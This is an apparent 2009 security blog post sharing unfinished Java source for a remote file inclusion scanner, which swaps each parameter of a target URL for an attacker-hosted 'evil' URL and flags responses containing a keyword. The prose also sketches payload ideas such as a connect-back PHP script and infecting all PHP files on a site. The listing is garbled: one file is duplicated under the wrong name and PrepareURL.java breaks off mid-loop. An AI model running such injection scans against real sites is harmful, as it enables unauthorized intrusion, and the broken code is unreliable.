[POC] RFI Scanner

Posted: January 5, 2009 in kd-team archive, tools
Tags: , , , ,

Well it certainly is true, why not? That question never has a correct answer imo. It is the same question I asked myself yesterday. I was like thinking what to write on my blog (I was bored and thought that blog writing could help) after a while I just gave up (so lesson learned: only write when you actually have something to write). So today I fired up my browser(for the ones wondering, this is a personal opinion, I use: Opera {FTW!}, IE {nice}, FF {sucks}, I use them depending on what I need) and the first things I saw was this. Which is funny since it’s just a couple of days ago since I posted about python and now I see a nice and small python script to do funky stuff.

So I hadn’t even finished reading and I followed the first link I encountered which is this one. It’s a very nice write up on how to own IIS 5 using “mythical” exploits. So this brought me back to my first question a day earlier: why not? Since I didn’t have an answer for that, here is my never finished source code to scan for RFI(remote file inclusions). The whole reason I started out to code this scanner was because I’m lazy and I thought…why do it myself if I can automate it. If you want a overview about things you should and you shouldn’t automate on a pentest , read this write up.

Basically my todo list when I first wanted to code the scanner was as follow:

  • implement looping through params
  • implement setting params to evil url with evil php
  • check response for specified keyword

Then when I was working on it and I had some better ideas to detect RFI which I then never got around to implement:

  • create php which copies an image and renames it to evil.extension, then check if that exists, it’s more reliable then just checking if the page returns a certain keyword (renaming .php to .txt would be stupid, it would open the door for every single person out there)
  • create a php which connects back, so the scanner only has to know if there has been a connect back from the ip it’s scanning (only works if allowed)
  • create a php which has a time delay, the scanner would then just request the url twice , with and without evil php, and measure time difference
  • infect all php files with a header that outputs “hi” then call the url again to clean all php files

So who knows maybe I will one day extend this scanner or maybe I’ll even attempt to rewrite it in python including the features I never got around to implement.

main.java


/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy			_conProxy;
    private boolean			_useProxy;
    private String _SEARCH_WORD;
    private String _vUrl,_aUrl;
    /**
     * @param args
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    public void scan(){
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                try{
                    System.out.println("SCANNING: " + u.toString());
                    BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break;//stop searching
                        }
                    }
                }catch(IOException ioe){
                    //well do nothing
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }        
    }
}

RfiScanner.java


/*
 * RfiScanner.java
 *
 * Created on 9 november 2007, 19:39
 *
 * @author DiabloHorn
 */

package rrfiscanner;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;
import java.net.MalformedURLException;
import java.net.Proxy;
import java.net.URL;
import java.net.URLConnection;

/**
 *
 * @author DiabloHorn
 */
public class RfiScanner {
    private Proxy			_conProxy;
    private boolean			_useProxy;
    private String _SEARCH_WORD;
    private String _vUrl,_aUrl;
    /**
     * @param args
     */
    public RfiScanner(String vUrl,String aUrl) {
        this._vUrl = vUrl;
        this._aUrl = aUrl;
    }

    public void setUseProxy(boolean use){
        this._useProxy = use;
    }

    public void setProxy(Proxy proxy){
        this._conProxy = proxy;
    }

    public void setSearchWord(String word){
        this._SEARCH_WORD = word;
    }

    public void scan(){
        try {
            PrepareURL victimURL = new PrepareURL(_vUrl,_aUrl);
            URLConnection uc = null;
            while(victimURL.hasNext()) {
                URL u = victimURL.next();

                if (_useProxy) {
                    uc = u.openConnection(_conProxy);
                } else {
                    uc = u.openConnection();
                }
                try{
                    System.out.println("SCANNING: " + u.toString());
                    BufferedReader r = new BufferedReader(new InputStreamReader(uc.getInputStream()));
                    String c;
                    while ((c = r.readLine()) != null) {
                        if(c.indexOf(_SEARCH_WORD) != -1) {
                            System.out.println("VULNERABLE URL: " + u.toString());
                            break;//stop searching
                        }
                    }
                }catch(IOException ioe){
                    //well do nothing
                }
            }
        } catch (MalformedURLException mfue) {
            System.err.println(mfue.toString());
        } catch (Exception e) {
            System.err.println(e.toString());
        }        
    }
}

PrepareURL.java

/*
 * PrepareURL.java
 * @author DiabloHorn
 */

package rrfiscanner;

import java.net.MalformedURLException;
import java.net.URL;
import java.util.ArrayList;
import java.util.HashMap;
import java.util.Iterator;
import java.util.Set;

/**
 *
 * @author DiabloHorn
 */
public class PrepareURL {
  private static final int _nextItemInitialize = -1;
  private String _victimURL;
  private String _evilUrl;
  private ArrayList _attackUrlList;
  private int _nextItem;

  /**
  * @param victimUrl The URL of the site you want to inject stuff into it’s params
  * @param attackUrl The “stuff”
  * @throws MalformedURLException Wrong URL
  */
  public PrepareURL(String victimUrl,String attackUrl) throws MalformedURLException {
  this._victimURL = victimUrl;
  this._evilUrl = attackUrl;
  _nextItem = _nextItemInitialize;
  fillList();
  }

  /**
  * @return True if there is another element left, false otherwise
  */
  public boolean hasNext() {
  if(_nextItem == (_attackUrlList.size()-1)) {
  return false;
  }

  return true;
  }

  /**
  * @return Get the next url
  */
  public URL next() {
  _nextItem++;
  return _attackUrlList.get(_nextItem);
  }

  /**
  * This resets the class so you can loop again through the URL’s
  */
  public void reset() {
  _nextItem = _nextItemInitialize;
  }

  private void fillList() throws MalformedURLException {

  String query = _victimURL.substring(_victimURL.indexOf(“?”)+1);
  _attackUrlList = new ArrayList();
  if(query != null) {
  HashMap paramPairs = getParameters(query);
  Set paramNames = paramPairs.keySet();
  Iterator iParamNames = paramNames.iterator();
  String str;
  while(iParamNames.hasNext()) {
  str = iParamNames.next();
  _attackUrlList.add(new URL(_victimURL.replace(str+”=”+paramPairs.get(str), str+”=”+_evilUrl)));
  }
  }
  }

  /**
  * @param query The query to be stripped down to parameters and it’s values
  * @return A HashMap with paramname:paramvalue
  */
  private HashMap getParameters(String query) {
  HashMap paramPairs = new HashMap();

  String[] rawPairs = query.split(“&”);
  for(int i=0;i

Advertisements
Comments
  1. n4pst3r says:

    how yo compile !

  2. AkhlD says:

    thks fren…i was looking for a java scanner ;) i ll recode it and redirect the o/p to IRC via PircBot framework ;)

  3. XyLeM says:

    Would you like to make an affiliation with my forum?

    The link is: htpp://attackersc.altervista.org/ or http://attackersc.altervista.org/forums

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s